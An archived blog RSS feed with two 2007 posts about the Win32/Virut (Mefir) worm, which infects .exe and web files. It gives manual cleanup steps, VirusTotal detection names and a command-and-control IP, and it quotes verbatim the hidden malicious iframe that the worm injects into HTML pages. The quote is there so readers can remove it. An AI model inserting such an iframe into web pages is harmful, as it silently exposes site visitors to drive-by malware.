<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; mefir</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/mefir//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Fixes for files infected with Win32/virut.Virtob and Variants</title>
		<link>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/</link>
		<comments>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/#comments</comments>
		<pubDate>Mon, 12 Nov 2007 12:35:30 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[A.gen]]></category>

		<category><![CDATA[Eldorado]]></category>

		<category><![CDATA[limpiar]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[Ofinpa.A]]></category>

		<category><![CDATA[Vipre]]></category>

		<category><![CDATA[Virtob]]></category>

		<category><![CDATA[virustotal]]></category>

		<category><![CDATA[Virut]]></category>

		<category><![CDATA[Virut.at]]></category>

		<category><![CDATA[Virut.Gen]]></category>

		<category><![CDATA[Virut.NAV]]></category>

		<category><![CDATA[Win32 Virus]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/fixed-for-files-infected-with-virutnat-mefir/</guid>
		<description><![CDATA[

I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. 

Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a search and replace tools for [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="summary"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY3MTAxMQ.curie,80,302" rel="external nofollow" rev="shareapic:webicons"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004671011.png" width="130" height="130" alt="Activity Monitor Virus Icons" class="fl" /></a>I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. </p>
<p><span id="more-5"></span></p>
<p>Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a <a href="http://blog.kakkoi.net/windows/fixed-for-files-infected-with-virutnat-mefir#search-and-replace-tools">search and replace tools</a> for removing the embed code inside the infected files.</p>
<ol class="xoxo" style="color:#444">
<li>Make sure all of the infected (*.exe win32/virtob) files has been quarantine.</li>
<li>Optionally block outbound access to <tt>78.109.19.139:80</tt> &amp; irc port <tt>65520</tt> in your firewall settings.</li>
<li>Disabled AntiVirus if any.</li>
<li>Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).</li>
<li><a href="#search-and-replace-tools">Search</a> all files with <tt>*.htm, *.html, *.php, *.asp</tt> extensions.<br />
<strong>delete or replace</strong> the following text (strings)</p>
<pre>
&lt;iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"&gt;&lt;/iframe&gt;</pre>
</li>
</ol>
<h2 id="search-and-replace-tools" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Search and Replace Tools</h2>
<ul class="xoxo" style="color:#555">
<li>For windows - there is lots of similar tools and I&#8217;m not sure which one to recommend as it seem most did the same thing so Google for <a href="http://www.google.com/search?q=search-and-replace&amp;ie=utf-8&amp;oe=utf-8">&#8220;search-and-replace&#8221;</a> pick your best. </li>
<li>For Cygwin or *nix bash console - Used <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;hs=ms3&#038;q=Find+and+replace+%22sed%22&#038;btnG=Search" rel="nofollow">sed</a> commands to search &#038; replace strings in all infected files.</li>
<li> Python in windows - You can try <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;q=python+Find+and+replace+string+in+file+&#038;btnG=Search">this solutions</a>.</li>
</ul>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Win32/Virut Virustotal.com Results</h2>
<table border="0">
<tr>
<th>Antivirus</th>
<th>Version</th>
<th>Last Update</th>
<th>Result</th>
</tr>
<tr>
<td>AhnLab-V3</td>
<td>2007.11.12.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>AntiVir</td>
<td>7.6.0.34</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.AF</td>
</tr>
<tr>
<td>Authentium</td>
<td>4.93.8</td>
<td>2007.11.10</td>
<td>-</td>
</tr>
<tr>
<td>Avast</td>
<td>4.7.1074.0</td>
<td>2007.11.11</td>
<td style="color: red">Win32:Virtob</td>
</tr>
<tr>
<td>AVG</td>
<td>7.5.0.503</td>
<td>2007.11.11</td>
<td style="color: red">Win32/Virut</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.6.Gen</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>9.00</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.K</td>
</tr>
<tr>
<td>ClamAV</td>
<td>0.91.2</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut-5</td>
</tr>
<tr>
<td>DrWeb</td>
<td>4.44.0.09170</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.19</td>
</tr>
<tr>
<td>eSafe</td>
<td>7.0.15.0</td>
<td>2007.11.08</td>
<td>-</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>31.2.5289</td>
<td>2007.11.12</td>
<td style="color: red">Win32/Virut.6375</td>
</tr>
<tr>
<td>Ewido</td>
<td>4.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>FileAdvisor</td>
<td>1</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Fortinet</td>
<td>3.11.0.0</td>
<td>2007.10.19</td>
<td style="color: red">W32/Virut.AE</td>
</tr>
<tr>
<td>F-Prot</td>
<td>4.4.2.54</td>
<td>2007.11.10</td>
<td style="color: red">W32/Injector.A.gen!Eldorado</td>
</tr>
<tr>
<td>F-Secure</td>
<td>6.70.13030.0</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>Ikarus</td>
<td>T3.1.1.12</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.AS</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>7.0.0.125</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>McAfee</td>
<td>5160</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.g</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.3007</td>
<td>2007.11.12</td>
<td style="color: red">Virus:Win32/Virut.Q</td>
</tr>
<tr>
<td>NOD32v2</td>
<td>2653</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Norman</td>
<td>5.80.02</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.W</td>
</tr>
<tr>
<td>Panda</td>
<td>9.0.0.4</td>
<td>2007.11.11</td>
<td style="color: red">W32/Virutas.W</td>
</tr>
<tr>
<td>Prevx1</td>
<td>V2</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Rising</td>
<td>20.18.02.00</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.z</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.23.0</td>
<td>2007.11.12</td>
<td style="color: red">W32/Vetor-G</td>
</tr>
<tr>
<td>Sunbelt</td>
<td>2.2.907.0</td>
<td>2007.11.09</td>
<td style="color: red">VIPRE.Suspicious</td>
</tr>
<tr>
<td>Symantec</td>
<td>10</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.W</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.2.9.124</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.gen</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.12.2.4</td>
<td>2007.11.11</td>
<td>-</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.3.26:9</td>
<td>2007.11.11</td>
<td style="color: red">Win32.Virut.Gen.4</td>
</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>6.0.1</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.AF</td>
</tr>
<tr>
<td colspan="4"></td>
</tr>
</table>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Notes on Microsoft Windows Malicious Software Removal Tool</h2>
<p><em>Update On: Nov,20 2007 by NoahArk</em><br />
I have <strong>Win.32/virut</strong> files in my archive (for backup purpose). Last week I installed <a title="Windows Malicious Software Removal tool" href="http://blog.kakkoi.net/uri/d3d3Lm1pY3Jvc29mdC5jb20vZG93bmxvYWRzL2RldGFpbHMuYXNweD9GYW1pbHlJZD1BRDcyNEFFMC1FNzJELTRGNTQtOUFCMy03NUI4RUIxNDgzNTY.curie,80,302">Microsoft Windows Malicious Software Removal tool v1.35</a> (Nov 13, 2007, KB890830).</p>
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/microsoft-malicious-software-removal-tool.gif" alt="Microsoft Malicious Software Removal Tool" style="margin: 0pt 5px 1px 0pt; float: left" /> Microsoft&#8217;s <a href="http://blog.kakkoi.net/uri/c3VwcG9ydC5taWNyb3NvZnQuY29tLz9rYmlkPTg5MDgzMA.curie,80,302" title="Microsoft Knowledge Base">claimed</a> this tool can fixes <em>w32/Virut</em> . But the results is much worsed than I expected. It doesn&#8217;t detect <strong>Win32/Virut </strong>on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob &amp; Virut[A-W] (infecting *.exe &amp; *.html). I&#8217;d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.</p>
<p>I still keep the infected Win32/Virut files, if anyone need it please send an email to <img src="http://i.kakkoi.net/nhnoah-gmail.png" alt="nhnoah email" width="144" height="21" title="gmail" />. My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client&#8217;s (including me) wont have to hunt down on pricey antivirus solutions. </p>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">W32/Virut and ntkrnlpa.info</h2>
<blockquote><p>The worms started spreading since <span style="color:#444">September 2006</span>. After one year anniversay It still in the wild like it will never stop. </p></blockquote>
<p>I&#8217;d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url. </p>
<p>This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.</p>
<p> Based on wikipedia <a href="http://en.wikipedia.org/wiki/Usage_share_of_web_browsers">&#8220;Usage share of Web Browser Statistics&#8221;</a>, <strong>81%</strong> of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn&#8217;t blocked IFRAME that can be a problem. </p>
<p>Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening. </p>
<h2 id="related-post" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Related Entries</h2>
<ul class="xoxo">
<li><a href="http://blog.kakkoi.net/virus/how-to-safeguard-your-windows-when-cleaning-files-infected-by-win32-virus/"> Tips on How to safeguard your Windows when cleaning files infected by win32 virus.</a></li>
<li> <a href="http://blog.kakkoi.net/windows/how-to-block-website-without-using-firewall/"> How to Block Acces to Unsavory Websites Without using Firewall or third party software</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/feed/</wfw:commentRss>
		</item>
		<item>
		<title>win32.virut Bad day for web developer</title>
		<link>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/</link>
		<comments>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/#comments</comments>
		<pubDate>Sun, 11 Nov 2007 23:20:31 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[ranting]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[virut.nat]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/one-really-bad-worm-for-web-developer/</guid>
		<description><![CDATA[

Just after my previous cleanup, now i got much worse virus on my PC its called Worm.Win32.Mefir [a-z] by both Norton Antivirus (Symantec) &#38; Avast (Alwil Software) NOD32 identified it as Win32/Virut.NAT
At the time being It infected *.html &#38; *.php files and probably all text/html types. There is no cure yet. I hated this worms [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Just after my <a href="http://blog.kakkoi.net/virus/w32virutw/">previous cleanup</a>, now i got much worse virus on my PC its called <strong>Worm.Win32.Mefir</strong> [a-z] by both Norton Antivirus (Symantec) &amp; Avast (Alwil Software) NOD32 identified it as <strong>Win32/Virut.NAT</strong></p>
<p>At the time being It infected *.html &amp; *.php files and probably all text/html types. There is no cure yet. I hated this worms I&#8217;d lost few project because of this. Try archive (LZMA) all your web projects before hand. Its spreading like wild fire.</p>
<p>I havent try cleaning the infected files with Trend HouseCall Online Scans. Just hope there is cure for this worm. damn damn</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
